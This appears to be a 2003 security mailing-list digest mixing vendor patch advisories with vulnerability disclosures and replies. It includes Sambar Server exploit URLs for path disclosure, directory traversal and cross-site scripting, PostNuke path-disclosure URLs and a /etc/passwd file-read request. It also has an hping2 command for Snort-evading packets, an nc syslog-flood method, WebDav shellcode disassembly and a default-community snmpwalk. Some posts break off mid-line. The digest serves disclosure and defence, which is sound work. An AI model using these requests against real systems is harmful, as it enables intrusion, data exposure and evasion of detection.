Re: Vulnerability (critical): Digital signature for Adobe Acrobat/Reader plug-in can be forged

[Dan Harkless]

Vladimir Katalov <[EMAIL PROTECTED]> writes:
>   We were able to write a 'fake' plug-in "fakecert.api" which does
>   nothing, but being loaded by Adobe Acrobat (and Reader) 4 and 5
>   as the certified one even in 'trusted' mode, though we don't have
>   a 'Reader Integration Key' (this plug-in has been provided only to
>   Adobe and CERT). When installed into 'plug_ins' subfolder, plug-in
>   is being loaded every time when Adobe Acrobat (or Reader) starts, and
>   shows a simple message box.

For those of us not familiar with Acrobat plugins, is there some facility
for the program retrieving/installing plugins automatically, or, to exploit
this would you need to entice a user to manually place your .api file in
their "plug_ins" directory (or run an installer program that would do so, in
which case you could run arbitrary code anyway in the installer)?

--
Dan Harkless
[EMAIL PROTECTED]
http://harkless.org/dan/

PostNuke Sensitive Information Disclosure

[rkc]

Title: PostNuke path disclosure, and... (db name).
Version: 0.7.2.3-Phoenix (other)
Problem: 

A vulnerability have been found in Postnuke (v0.7.2.3-Phoenix) which allow 
users to determine the physical path of this cms. 

This vulnerability would allow a remote user to determine the full path to 
the web root directory and other information, like the database name (!) 

Example: 

http://www.target.com/modules.php?op=modload&name=Members_List&file=index&le 
tter=All&sortby=uname1234 

Change 1234 by anything. 

- 

If you are looking for: 

* Path disclosure in 0.7.2.2 & 0.7.2.1 v:
(Two simples examples) 

http://www.target.com/modules.php?op=modload&name=Stats&file= 

http://www.target.com/modules.php?op=modload&name=Members_List&file=index&le 
tter=Svi&sortby=uname1234 

(Change 1234 by anything). 

(not.always) 

- 

Solutions: 

Change the Member_List privileges, for admin's only (?)
Deactivate the Member_List module (?) 

- 

Greetz ! 

rkc 

~
Rep. Argentina
6765656B207374796C65
StFU, and RtFM !

Re: @(#)Mordred Labs advisory - PHP for Win32: buffer overflow in openlog() function

[Jason Brooke]

> III. Workaround
> 
> Not available at the time of writing.


in php.ini: 

disable_functions = openlog 

Problems with Snort-1.9.1

[Toby Miller]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Problem: Snort-1.9.1 using a default snort.conf configuration does
not detect certain crafted packets.

Details: Snort-1.9.1 does not detect packets when the SYN,FIN and ECN
echo bits set. The following is an example of a packet:

12:37:12.386797 10.1.1.6.18250 > 10.1.1.2.21536: SFE [tcp sum ok]
1178601305:1178601305(0) win 512 (ttl 104, id 5100, len 40)
0x   4500 0028 13ec  6806 28db 0a01 0106
E..(h.(.
0x0010   0a01 0102 474a 5420 4640 0759 0bec 8b73
[EMAIL PROTECTED]
0x0020   5043 0200 1735   PC...5..


Testing: In order to set this I used hping2 and the following
switches:

hping2 -t 104 -N -W -s 18245 -p 21536 -S -F -X 'IP Address'

When performing this test I found that Snort would detect a SYN,FIN
packet provided that the ECN echo packet was not set in the same
packet.

Problem: With the detect_scan option set in the stream4 preprocessor
Snort would not detect these packets.

Impact: Snort will not catch certain scans or attacks using these
TCP/IP flags.

Solution: Upgrade to Snort-2.0.0rc1
(www.snort.org/dl/snort-2.0.0rc1.tar.gz or if you need to use
Snort-1.9.1 to detect these packets, one would have to enable the
portscan preprocessor or delete the detect_scans option in the stream
4 preprocessor.

I would like to thank Chris Green of Snort for responding quickly to
this problem.

Thanks,
Toby

-BEGIN PGP SIGNATURE-
Version: PGPfreeware 6.5.8 for non-commercial use 

iQA/AwUBPoJs/VLhpjRJgUE5EQL8LwCg3eQVZYRgOtQOCZInFeZZDkh3JIUAoJAk
Bzgznvqfb7PhO5HML+/AXw2T
=BYxI
-END PGP SIGNATURE-

Re: Check Point FW-1: attack against syslog daemon possible

[Dr. Peter Bieringer]

Hi again,

now we are finished the investigation of FW-1 4.1 (SP6) with following 
result:

In our lab the syslog daemon of Check Point FW-1 4.1 didn't crash in case 
of sending "/dev/urandom" via "nc", but this floods the log without any 
rate limiting.

Also the syslog messages were not filtered.

Note also that that improving the ruleset didn't help in cases where 
trusted and untrusted nodes are sharing the same network, because in UDP 
packets the sender IP address can be spoofed (successfully tested with 
"sendip" against FW-1 4.1).

To avoid spoofing, only MAC based ACLs on gateways (if available) will help 
or establishing a dedicated (V)LAN for trusted sources only.

We've updated our advisory once again:

http://www.aerasec.de/security/advisories/txt/
checkpoint-fw1-ng-fp3-syslog-crash.txt
http://www.aerasec.de/security/advisories/
checkpoint-fw1-ng-fp3-syslog-crash.html
Hope this helps,
Peter
--
Dr. Peter Bieringer Phone: +49-8102-895190
AERAsec Network Services and Security GmbHFax: +49-8102-895199
Wagenberger Straße 1   Mobile: +49-174-9015046
D-85662 Hohenbrunn   E-Mail: [EMAIL PROTECTED]
GermanyInternet: http://www.aerasec.de

[SCSA-012] Multiple vulnerabilities in Sambar Server

[Grégory]

Security Corporation Security Advisory [SCSA-012]


PROGRAM: Sambar Server
HOMEPAGE: http://www.sambar.com/
VULNERABLE VERSIONS: 5.3 and prior 



DESCRIPTION


"Sambar Server is the new standard in high performance multi-functional 
servers with features rivaling other commercial products selling 
separately for several hundreds of dollars. It's Winsock2 compliant Win32
integration functions on Windows 95, Windows 98, Windows NT, Win2000, 
and XP as a service or as an application."
(direct quote from http://sambar.jalyn.net) 


DETAILS & EXPLOITS



¤ Path Disclosure :

Sambar default's installation of the CGI bin directory contains
a testcgi.exe and a environ.pl that allows remote users to view
information regarding the operating system and 
web server's directory.

These vulnerabilities can be triggered by a remote user submitting
a specially crafted HTTP request.


- Exploits :

http://[target]/cgi-bin/environ.pl

http://[target]/cgi-bin/testcgi.exe


Will produce the following output:

- environ.pl : 
--

Sambar Server CGI Environment Variables 
GATEWAY_INTERFACE: CGI/1.1 
PATH_INFO: 
PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl 
QUERY_STRING: 
REMOTE_ADDR: 127.0.0.1 
REMOTE_HOST: 
REMOTE_USER: 
REQUEST_METHOD: GET 
DOCUMENT_NAME: environ.pl 
DOCUMENT_URI: /cgi-bin/environ.pl 
SCRIPT_NAME: /cgi-bin/environ.pl 
SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl 
SERVER_NAME: localhost 
SERVER_PORT: 80 
SERVER_PROTOCOL: HTTP/1.1 
SERVER_SOFTWARE: SAMBAR 
CONTENT_LENGTH: 0 
CONTENT: 


- testcgi.exe :
---

Test CGI ... Version 1.00 [ build date 8-03-97 ]

QUERY_STRING 
PATH_INFO 
PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe 
SCRIPT_NAME /cgi-bin/testcgi.exe 
SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe 
DOCUMENT_ROOT C:/sambar53/docs/ 
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) 
REMOTE_ADDR 127.0.0.1 
REMOTE_HOST 
SERVER_NAME localhost 
SERVER_PROTOCOL HTTP/1.1 
SERVER_SOFTWARE SAMBAR 
CONTENT_TYPE 




¤ Directory Disclosure :

Other security vulnerabilities was found in Sambar which allow an
attacker to reveal the content of the files and the directories 
on the web server, even if it should not be revealed.

These vulnerabilities can be simply exploited by requesting a 
specially crafted URL utilizing iecreate.stm and ieedit.stm
application with a '../' appended.

- Exploits :

http://[target]/sysuser/docmgr/iecreate.stm?template=../

http://[target]/sysuser/docmgr/ieedit.stm?url=../





¤ Cross Site Scripting :

Many exploitable bugs was found on Sambar Server which cause script
execution on client's computer by following a crafted url.

This kind of attack known as "Cross-Site Scripting Vulnerability" is 
present in many section of the web site, an attacker can input 
specially crafted links and/or other malicious scripts.

- Exploits : 

http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]

http://[target]/netutils/whodata.stm?sitename=[hostile_code]

http://[target]/netutils/findata.stm?user=[hostile_code]

http://[target]/netutils/findata.stm?host=[hostile_code]

http://[target]/isapi/testisa.dll?check1=[hostile_code]

http://[target]/cgi-bin/environ.pl?param1=[hostile_code]

http://[target]/samples/search.dll?query=[hostile_code]&logic=AND

http://[target]/wwwping/index.stm?wwwsite=[hostile_code]

http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456

http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]

http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]

http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]

http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]

http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]

http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]

http://[target]/sysuser/docmgr/search.stm?query=[hostile_c

Re: @(#)Mordred Labs advisory - Integer overflow in PHP memory allocator

[Dullien]

Hey Mr. Mordred, all,

> In PHP emalloc() function implements the error safe wrapper around
> malloc().
> Unfortunately this function suffers from an integer overflow and
> considering the fact that emalloc() is used in many places around PHP
> source code, it may lead to many serious security issues.

IIRC this bug was mentioned in a talk at last summers Black Hat conference.

http://www.blackhat.com/html/bh-usa-02/bh-usa-02-speakers.html#Dowd

Cheers,
[EMAIL PROTECTED]

-- 
+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!

Re: PHPNuke viewpage.php allows Remote File retrieving

[admin]

In-Reply-To: <[EMAIL PROTECTED]>

>From: Christopher Warner <[EMAIL PROTECTED]>
>
>If you could follow up on this and give more details (versions affected)
>etc etc; as it stands I'm gonna confirm that viewpage.php hasn't existed
>for quite some time and that this is a pretty pointless advisory.
>
>Thanks,
>Christopher Warner
>

This is NOT a phpnuke file and never has been.  It can be traced to 
NukeStyles (http://www.nukestyles.com/).  See this thread/discussion: 
http://nukecops.com/postx1337-0-0.html

D-Link DI-614 wiresless router crash/reboots

[Thomas Reinke]

A user of ours has reported that the D-Link DI-614+
Wireless router/firewall is vulnerable to several old,
well known vulnerablities.  The user was able to reproduce
the problem multiple times with consistent results.  Not
having the equipment, we have NOT reproduced these ourselves,
and would appreciate if anyone can corroborate these
problems.
The vendor was notified on March 13th and has not responded
back.
Both tests causing problems were reproduced using the Nessus
test suite. Test IDs are Nessus test ID numbers and are
supplied for reference.
Nestea:  A Nestea attack applied to the device causes the
device to spontaneously reboot. The device is out of
operation for only a few seconds and is then back in
service with no other known impact.
Ref: http://www.securityspace.com/smysecure/catid.html?id=10148
Linux 0 length fragment bug: Sending the appropriate packet
causes the device to crash requiring a power off-on cycle
to recover.
Ref: http://www.securityspace.com/smysecure/catid.html?id=10134
If anyone can support that their device does or does not behave
similarly it would be appreciated.
Thomas
--
SecuritySpace
http://www.securityspace.com

Re: PHPNuke viewpage.php allows Remote File retrieving

[Kevin]

I have just checked 5 different 6.5 installs some of which have been 
upgraded from previous 6.5 beta's and this file most definattly does not 
exist under 6.5

[EMAIL PROTECTED] wrote:

In-Reply-To: <[EMAIL PROTECTED]>

 

From: Jim Geovedi <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: PHPNuke viewpage.php allows Remote File retrieving
Message-Id: <[EMAIL PROTECTED]>
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Organization: Will Work For Bandwidth, Inc.
X-Mailer: Superunknown.
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
On Tue, 25 Mar 2003 11:59:26 -0600 DaiTengu wrote:
   

viewpage.php is a part of PHPNuke.
The Script allows an attacker to view all files on the System.
Example:

http://server.com/viewpage.php?file=/etc/passwd
   

umm, what version of phpNuke is vulnerable to this? as far as I'm
aware, there has not been any viewpage.php since before 5.0...
I beleive this was reported then as well. 
reguardless, this is not true with 6.0
 

it's repeatable on PHP-Nuke 6.5.

--
Jim Geovedi <[EMAIL PROTECTED]>
   

I have the vanilla 6.5 and there is no viewpage.php file in the package 
that I can find.  Are you sure that this isn't in an addon?  Or possibly 
left over from a previous version that was never cleared out when phpnuke 
was updated?

 

Immunix Secured OS 7+ openssl update

[Immunix Security Team]

---
Immunix Secured OS Security Advisory

Packages updated:   openssl, openssh, mod_ssl
Affected products:  ImmunixOS 6.2, 7.0, 7+
Bugs fixed: CAN-2003-0131 CAN-2003-0147
Date:   Wed Mar 26 2003
Advisory ID:IMNX-2003-7+-001-01
Author: Seth Arnold <[EMAIL PROTECTED]>
---

Description:
  This update fixes two problems with openssl packages and recompiles
  openssh and mod_ssl against the new version of openssl. Quoting from
  the OpenSSL advisory:
Vlastimil Klima, Ondrej Pokorny, and Tomas Rosa have come up with an
extension of the "Bleichenbacher attack" on RSA with PKCS #1 v1.5
padding as used in SSL 3.0 and TLS 1.0. Their attack requires the
attacker to open millions of SSL/TLS connections to the server under
attack; the server's behaviour when faced with specially made-up RSA
ciphertexts can reveal information that in effect allows the attacker
to perform a single RSA private key operation on a ciphertext of
its choice using the server's RSA key. Note that the server's RSA
key is not compromised in this attack.
  The other problem, quoting from the CERT advisory: David Brumley and Dan
Boneh, researchers at Stanford University, have written a paper that
demonstrates a practical attack that can be used to extract private
keys from vulnerable RSA applications.  Using statistical techniques
and carefully measuring the amount of time required to complete an
RSA operation, an attacker can recover one of the factors (q) of the
RSA key. [...] Under optimal conditions, a 1024-bit RSA private key
was extracted in approximately two hours using ~350,000 guesses.

  References: http://www.kb.cert.org/vuls/id/997481
  http://www.openssl.org/news/secadv_20030319.txt

Package names and locations:
  Precompiled binary packages for Immunix 7+ are available at:
  
http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/mod_ssl-2.8.12-1.7_imnx_2.i386.rpm
  
http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/openssh-3.4p1-1_imnx_10.i386.rpm
  
http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/openssh-askpass-3.4p1-1_imnx_10.i386.rpm
  
http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/openssh-clients-3.4p1-1_imnx_10.i386.rpm
  
http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/openssh-server-3.4p1-1_imnx_10.i386.rpm
  
http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/openssl-0.9.6g-1_imnx_2.i386.rpm
  
http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/openssl-devel-0.9.6g-1_imnx_2.i386.rpm
  
http://download.immunix.org/ImmunixOS/7+/Updates/RPMS/openssl-perl-0.9.6g-1_imnx_2.i386.rpm

Immunix OS 7+ md5sums:
  17a8a4c07a421c0b0a98369d77d06ed4  openssh-3.4p1-1_imnx_10.i386.rpm
  59bffcfb9ca2fbe74e9d2eb3568d134a  openssh-askpass-3.4p1-1_imnx_10.i386.rpm
  37d2acf53c72ee23e5f9576557a5fd6e  openssh-clients-3.4p1-1_imnx_10.i386.rpm
  d61f9a2c3fc41f8dded88f2b84be2a83  openssh-server-3.4p1-1_imnx_10.i386.rpm
  ccb8fa2cce44efa243d368cf7785b9cf  openssl-0.9.6g-1_imnx_2.i386.rpm
  0ba9e8a2c9728a64ee4a89aa2cecd804  openssl-devel-0.9.6g-1_imnx_2.i386.rpm
  fa6f0d1dde78b941a8bc9147dfd7a5b6  openssl-perl-0.9.6g-1_imnx_2.i386.rpm
  490d4340e153daff3e3e4e548321e5af  mod_ssl-2.8.12-1.7_imnx_2.i386.rpm


GPG verification:   
  Our public key is available at .   

NOTE:
  Ibiblio is graciously mirroring our updates, so if the links above are
  slow, please try:
ftp://ftp.ibiblio.org/pub/Linux/distributions/immunix/
  or one of the many mirrors available at:
http://www.ibiblio.org/pub/Linux/MIRRORS.html

  ImmunixOS 6.2 is no longer officially supported.
  ImmunixOS 7.0 is no longer officially supported.

Contact information:
  To report vulnerabilities, please contact [EMAIL PROTECTED] WireX 
  attempts to conform to the RFP vulnerability disclosure protocol
  .


pgp0.pgp
Description: PGP signature

RE: WebDav Exploit ffs

[Exurity Debugs]

I don't believe your shell code will work on other Kernel32.dll than the
version with the following ImageBase:
"\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..

Because your code is reversed as:

loc_8F:
mov eax, [esi]
add eax, ebp
cmp dword ptr [eax], 50746547h
jnz short loc_C0
cmp dword ptr [eax+4], 41636F72h
jnz short loc_C0
cmp dword ptr [eax+8], 65726464h
jnz short loc_C0
mov eax, [edi+24h]
add eax, ebp
movzx   ebx, word ptr [eax+edx*2]
mov eax, [edi+1Ch]
add eax, ebp
mov ebx, [eax+ebx*4]
add ebx, ebp

; should jump to found
loc_C0:
add esi, 4
inc edx
cmp edx, [edi+18h]
jnz short loc_8F
; then reached all and could not find, so find another version
So, if the Kernel32.dll happens to be different than the default, it will
simply crash without going too far.
Best regards
Peter Huang
Jumpable, Callable & Overflowing XPoson, New Exploitation Technology on the
way

[RHSA-2003:051-01] Updated kerberos packages fix various vulnerabilities

[bugzilla]

-
   Red Hat Security Advisory

Synopsis:  Updated kerberos packages fix various vulnerabilities
Advisory ID:   RHSA-2003:051-01
Issue date:2003-03-26
Updated on:2003-03-26
Product:   Red Hat Linux
Keywords:  krb5
Cross references:  RHSA-2003:052
Obsoletes: RHSA-2003:020
CVE Names: CAN-2003-0028 CAN-2003-0036 CAN-2003-0058 CAN-2003-0059 
CAN-2003-0072 CAN-2003-0082 CAN-2003-0138 CAN-2003-0139
-

1. Topic:

Updated Kerberos packages fix a number of vulnerabilities found in MIT
Kerberos.

2. Relevant releases/architectures:

Red Hat Linux 6.2 - i386
Red Hat Linux 7.0 - i386
Red Hat Linux 7.1 - i386
Red Hat Linux 7.2 - i386, ia64
Red Hat Linux 7.3 - i386
Red Hat Linux 8.0 - i386

3. Problem description:

Kerberos is a network authentication system. The MIT Kerberos team
released an advisory describing a number of vulnerabilities that affect the
kerberos packages shipped by Red Hat. These vulnerabilities include:

An integer signedness error in the ASN.1 decoder before version 1.2.5
allows remote attackers to cause a denial of service (crash) via a large
unsigned data element length, which is later used as a negative value. The
Common Vulnerabilities and Exposures project has assigned the name
CAN-2002-0036 to this issue. Red Hat Linux 8.0 and later are not affected
by this issue.

The Key Distribution Center (KDC) before version 1.2.5 allows remote,
authenticated attackers to cause a denial of service (crash) on KDCs within
the same realm using a certain protocol request that causes a null
dereference (CAN-2003-0058). Red Hat Linux 8.0 and later are not affected
by this issue.

The Key Distribution Center (KDC) allows remote, authenticated attackers to
cause a denial of service (crash) on KDCs within the same realm using a
certain protocol request that causes an out-of-bounds read of an array
(CAN-2003-0072).

The Key Distribution Center (KDC) allows remote, authenticated attackers
to cause a denial of service (crash) on KDCs within the same realm using a
certain protocol request that causes the KDC to corrupt its heap
(CAN-2003-0082).

A vulnerability in Kerberos before version 1.2.3 allows users from one
realm to impersonate users in other realms that have the same inter-realm
keys (CAN-2003-0059). Red Hat Linux 7.3 and later are not affected by this
issue.

The MIT advisory for these issues also mentions format string
vulnerabilities in the logging routines (CAN-2003-0060). Previous versions
of the kerberos packages from Red Hat already contain fixes for this issue.

Vulnerabilities have been found in the support for triple-DES keys in the
implementation of the Kerberos IV authentication protocol which is included
in MIT Kerberos (CAN-2003-0139).

Vulnerabilities have been found in the Kerberos IV authentication protocol
which allow an attacker with knowledge of a cross-realm key, which is
shared with another realm, to impersonate any principal in that realm to
any service in that realm. This vulnerability can only be closed by
disabling cross-realm authentication in Kerberos IV (CAN-2003-0138).

Vulnerabilities have been found in the RPC library used by the kadmin
service in Kerberos 5. A faulty length check in the RPC library exposes
kadmind to an integer overflow which can be used to crash kadmind
(CAN-2003-0028).

All users of Kerberos are advised to upgrade to these errata packages,
which disable cross-realm authentication by default for Kerberos IV and
which contain backported patches that correct these issues.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which are
not installed but included in the list will not be updated.  Note that you
can also use wildcards (*.rpm) if your current directory *only* contains
the
desired RPMs.

Please note that this update is also available via Red Hat Network.  Many
people find this an easier way to apply updates.  To use Red Hat Network,
launch the Red Hat Update Agent with the following command:

up2date

This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system.

5. RPMs required:

Red Hat Linux 6.2:

SRPMS:
ftp://updates.redhat.com/6.2/en/os/SRPMS/krb5-1.1.1-40.src.rpm

i386:
ftp://updates.redhat.com/6.2/en/os/i386/krb5-configs-1.1.1-40.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/krb5-devel-1.1.1-40.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/krb5-libs-1.1.1-40.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/krb5-server-1.1.1-40.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/krb5-workstation-1

Re: Security Advisory - MyTaxexpress 2003

[HCTITS Security Division]

Did this guy miss the discussion about this very issue like, two weeks
ago?

I think the ultimate resolution of that discussion was that users are
lazy and stupid ("uninformed"), not likely to change defaults or be
savvy enough to use third-party encryption software, much less be
inclined to have to engage in that extra step.

There comes a point when we must wash our hands of the matter and leave
the user's security up to the user.  Inform them, yes, but leave them to
their own informed peril.

It sounds like most tax software does not encrypt personal data and
stores it in predictable locations.  I think a better tack on this
matter is to take steps to prevent the data from being accessible to
outside attackers.  Inform users how to disable the insecure default
shares that some OSes create and how to protect their computers from
many data-compromising vulnerabilities.  For example, "My Documents"
shouldn't be allowed to be accessible from outside anyway.

Or we could all do our taxes on paper, hand-deliver them to their
respective agents, keep our record copies in 6-inch hardened-steel
glass-packed (remember The Score?) fireproof safes, and crosscut-shred,
bleach, and burn any other paperwork with sensitive information.  

Regards,
~Brian


On Tue, 2003-03-25 at 14:46, Nathan Wosnack wrote:
> 
> 
> Original Advisory: Tuesday, March 25, 2003
> 
> Severity: Medium - High
> 
> Description: Unencrypted tax-return information saved in C:\My Documents 
> by default can pose security risks, and may disclose financial/personal 
> information to the Internet via peer-to-peer (P2P) networks.
> 
> Version: Tested on the version released March 20, 2003
> 
> Authors: David Coomber and Nathan Wosnack were involved in the research 
> and development.
> 
> Tax Software Background:
> 
> MyTaxexpress 2003 is a CCRA (Canada Customs and Revenue Agency) certified 
> GUI application developed by ExpressInfo Software that allows Canadian tax 
> payers located in Alberta, British Columbia, and Ontario to work through 
> their tax returns and file them electronically using a tax filing system 
> known as NETFILE.
> 
> Description of the problem:
> 
> If you decide to save your return, your personal information is saved to 
> your computer unencrypted in the directory C:\My Documents by default with 
> a *.ret extension. The problem with this is two-fold; if someone is able 
> to access this file, then all they would need to do is open it with a text 
> editor such as Notepad to reveal personal information. The personal 
> information disclosed includes your full name, your address, your social 
> insurance number, your earnings, spending claims, where you work, etc. 
> Saving your tax files in C:\My Documents makes it easier to get a hold of 
> since many Microsoft Windows users share C:\My Documents when using P2P 
> programs without understanding the consequences. Also, Many P2P file-
> sharing networks have been known to share the C:\My Documents folder. One 
> such example of a file sharing program that does this is a program 
> called 'Kazaa' (with K++ extensions). With a simple query on Kazaa, 
> looking up file names such as 'taxes 2003.ret', 'taxes.ret', one could 
> gather large amounts of data on unsuspecting users that have C:\My 
> Documents shared.
> 
> Recommendations:
> 
> Due to the fact that MyTaxexpress does not encrypt your tax return when 
> saved to disk, and stores it in C:\My Documents by default, the risk of 
> having personal financial information stolen and used for illegal purposes 
> is high. In order to protect this financial information from disclosure 
> and misuse, we recommend saving your returns in a different directory and 
> encrypting your returns (and all other personal information) with a strong 
> encryption program such as Blowfish for Windows(1) or similar.
> 
> Related Links:
> 
> http://www.pivx.com/ - Related advisories focusing on United States tax 
> software.
> 
> http://www.hypervivid.com/ - Information, Telecom and Wireless Security 
> Consulting Firm.
> 
> Vendor Contact:
> 
> http://www.mytaxexpress.com/ - ExpressInfo software.
> 
> Have any questions or comments?
> e-mail: [EMAIL PROTECTED]
> 
> Copyright © 2003, Hypervivid Solutions Incorporated. All Rights Reserved. 
> (1) Note: We are not affiliated with any products or services mentioned on 
> this page, we provide the links solely as a convenience to the reader.

TSLSA-2003-0014 - glibc

[Trustix Secure Linux Advisor]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Trustix Secure Linux Security Advisory #2003-0014

Package name:  glibc
Summary:   xdr / rpc
Date:  2003-03-26
Affected versions: TSL 1.1, 1.2, 1.5

- --
Package description:
  The glibc package contains standard libraries which are used by multiple
  programs on the system. In order to save disk space and memory, as well as to
  make upgrading easier, common system code is kept in one place and shared
  between programs. This particular package contains the most important sets of
  shared libraries: the standard C library and the standard math library.
  Without these two libraries, a Linux system will not function.  The glibc
  package also contains national language (locale) support and timezone
  databases.


Problem description:
   An integer overflow was discovered in the xdrmem_getbytes() function of
   glibc 2.3.1 and earlier.  This function is part of the XDR encoder/decoder
   derived from Sun's RPC implementation.  
   
   This vulnerability might cause buffer overflows and could possibly be
   exploited to execute arbitray code.



Action:
  We recommend that all systems with this package installed be upgraded.


Location:
  All TSL updates are available from
  http://www.trustix.net/pub/Trustix/updates/>
  ftp://ftp.trustix.net/pub/Trustix/updates/>


About Trustix Secure Linux:
  Trustix Secure Linux is a small Linux distribution for servers. With focus
  on security and stability, the system is painlessly kept safe and up to
  date from day one using swup, the automated software updater.


Automatic updates:
  Users of the SWUP tool can enjoy having updates automatically
  installed using 'swup --upgrade'.

  Get SWUP from:
  ftp://ftp.trustix.net/pub/Trustix/software/swup/>


Public testing:
  These packages have been available for public testing for some time.
  If you want to contribute by testing the various packages in the
  testing tree, please feel free to share your findings on the
  tsl-discuss mailinglist.
  The testing tree is located at
  http://www.trustix.net/pub/Trustix/testing/>
  ftp://ftp.trustix.net/pub/Trustix/testing/>
  

Questions?
  Check out our mailing lists:
  http://www.trustix.net/support/>


Verification:
  This advisory along with all TSL packages are signed with the TSL sign key.
  This key is available from:
  http://www.trustix.net/TSL-GPG-KEY>

  The advisory itself is available from the errata pages at
  http://www.trustix.net/errata/trustix-1.2/> and
  http://www.trustix.net/errata/trustix-1.5/>
  or directly at
  http://www.trustix.net/errata/misc/2003/TSL-2003-0014-glibc.asc.txt>


MD5sums of the packages:
- --
fe9c277153f6d22fdafd8a214401563f  ./1.5/SRPMS/glibc-2.1.3-22tr.src.rpm
a10d5a882dc223fbbac01f0693537da4  ./1.5/RPMS/nscd-2.1.3-22tr.i586.rpm
e5a446cd2fb6989d15614d71c7d0177c  ./1.5/RPMS/glibc-profile-2.1.3-22tr.i586.rpm
e40a865a6369976eb600853548c34527  ./1.5/RPMS/glibc-devel-2.1.3-22tr.i586.rpm
14dab8234b4c08ff4cbd31fde948d1f1  ./1.5/RPMS/glibc-2.1.3-22tr.i586.rpm
fe9c277153f6d22fdafd8a214401563f  ./1.2/SRPMS/glibc-2.1.3-22tr.src.rpm
4c4cab0eba6f73076e507efe1e2f06dc  ./1.2/RPMS/nscd-2.1.3-22tr.i586.rpm
3262c2d809b651441af57ec792dfed11  ./1.2/RPMS/glibc-profile-2.1.3-22tr.i586.rpm
6c48f30edec63f62a8cf1d763c734c1c  ./1.2/RPMS/glibc-devel-2.1.3-22tr.i586.rpm
97f7bd6d43c497b5978a8d86928027b3  ./1.2/RPMS/glibc-2.1.3-22tr.i586.rpm
fe9c277153f6d22fdafd8a214401563f  ./1.1/SRPMS/glibc-2.1.3-22tr.src.rpm
885a9828bf112e1b123bb24deda2191c  ./1.1/RPMS/nscd-2.1.3-22tr.i586.rpm
da31eac54e4c326df5e28035d754df23  ./1.1/RPMS/glibc-profile-2.1.3-22tr.i586.rpm
c177de4109b197c58021f8b32808f611  ./1.1/RPMS/glibc-devel-2.1.3-22tr.i586.rpm
155859e8c46919b1f9679a9746776b9a  ./1.1/RPMS/glibc-2.1.3-22tr.i586.rpm
- --


Trustix Security Team

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+gbm2wRTcg4BxxS0RArWpAJ9M+MprUO3XBQUZi86wuccmXlAHhwCdFB8k
wCChErohnZMFiLzXyII5nm8=
=O4dd
-END PGP SIGNATURE-

SNMP security issues in D-Link DSL Broadband Modem/Router

[Arhont Information Security]

Arhont Ltd  -   Information Security Company

Arhont Advisory by: Andrei Mikhailovsky (www.arhont.com)
Advisory:   D-Link DSL Broadband Modem/Router 
Router Model Name:  D-Link DSL-500
Model Specific: Other models might be vulnerable as well
Manufacturer site:  http://www.dlink.com
Manufacturer contact (UK):  Tel: 0800 9175063 / 0845
0800288 
Contact Date:   06/03/2003

DETAILS:

While performing a general security testing of a
network, we have found several security vulnerability
issues with the D-Link DSL Broadband Modem DSL-500

Issue 1:
The default router installation enables SNMP (Simple
Network Management Protocol) server with default
community names for read and read/write access. The
DSL-500 modem is configured alow SNMP access from the
WAN (Wide Area Network)/Internet side as well as from LAN.

[EMAIL PROTECTED]:~/bugtraq/DSL-modems$ snmpwalk -Os -c
public 192.168.0.1 -v 1
sysDescr.0 = STRING: D-Link DSL-500 version 7.1.0.30
Annex-A (Nov 28 2002) R2.21.002.04.b2t18uk
Copyright (c) 2000 Dlink Corp.
sysObjectID.0 = OID: enterprises.171.10.30.1
sysUpTime.0 = Timeticks: (14246347) 1 day, 15:34:23.47
...
...

The community name: public 

